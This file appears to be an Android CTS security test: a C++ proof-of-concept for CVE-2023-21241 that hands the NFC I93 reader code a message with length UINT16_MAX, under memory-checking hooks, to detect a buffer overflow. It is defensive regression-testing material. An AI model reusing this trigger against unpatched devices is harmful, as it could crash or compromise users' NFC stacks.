xref: /aosp_15_r20/cts/hostsidetests/securitybulletin/securityPatch/CVE-2023-21241/poc.cpp (revision b7c941bb3fa97aba169d73cee0bed2de8ac964bf) 
1 /*
2  * Copyright (C) 2023 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at:
7  *
8  * http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  *
16  */
17 
18 #include "../includes/common.h"
19 #include "../includes/memutils.h"
20 #include "nfc_types.h"
21 #include "rw_int.h"
22 #include "sys/types.h"
23 #include "tags_defs.h"
24 #include <stdint.h>
25 #include <sys/sysinfo.h>
26 #include <vector>
27 
28 void rw_i93_send_to_upper(NFC_HDR *p_resp);
29 
30 struct sysinfo memInfo;
31 extern tRW_CB rw_cb;
32 std ::vector<uint8_t> p_buff;
33 std ::vector<uint8_t> v_pmsg;
34 char enable_selective_overload = ENABLE_NONE;
35 
poc_cback(tRW_EVENT,tRW_DATA *)36 void poc_cback(tRW_EVENT /* event */, tRW_DATA * /* p_rw_data */) {}
37 
GKI_getbuf(uint16_t size)38 void *GKI_getbuf(uint16_t size) {
39   enable_selective_overload = ENABLE_ALL;
40   p_buff.resize(size);
41   enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
42   return (void *)p_buff.data();
43 }
44 
main()45 int main() {
46   // Check if there is structure mismatch between testing library and the
47   // library that is being tested
48   tNFC_ACTIVATE_DEVT p_activate_params = {};
49   p_activate_params.protocol = NFC_PROTOCOL_ISO_DEP;
50   p_activate_params.rf_tech_param.mode = NFC_DISCOVERY_TYPE_POLL_A;
51   RW_SetActivatedTagType(&p_activate_params, &poc_cback);
52   FAIL_CHECK(rw_cb.p_cback == &poc_cback);
53   GKI_init();
54   rw_init();
55 
56   // find the free memory available
57   sysinfo(&memInfo);
58   unsigned long long freeVirtualMem = memInfo.freeram;
59   freeVirtualMem += memInfo.freeswap;
60   freeVirtualMem *= memInfo.mem_unit;
61   FAIL_CHECK((sizeof(NFC_HDR) + UINT16_MAX) < freeVirtualMem * 0.8);
62 
63   // Call rw_i93_send_to_upper() with large value of p_msg->len
64   v_pmsg.resize(sizeof(NFC_HDR) + UINT16_MAX);
65   NFC_HDR *p_msg = (NFC_HDR *)v_pmsg.data();
66   rw_cb.tcb.i93.sent_cmd = I93_CMD_READ_SINGLE_BLOCK;
67   p_msg->offset = 0;
68   p_msg->len = UINT16_MAX;
69   rw_cb.p_cback = &poc_cback;
70   rw_i93_send_to_upper(p_msg);
71   return EXIT_SUCCESS;
72 }
73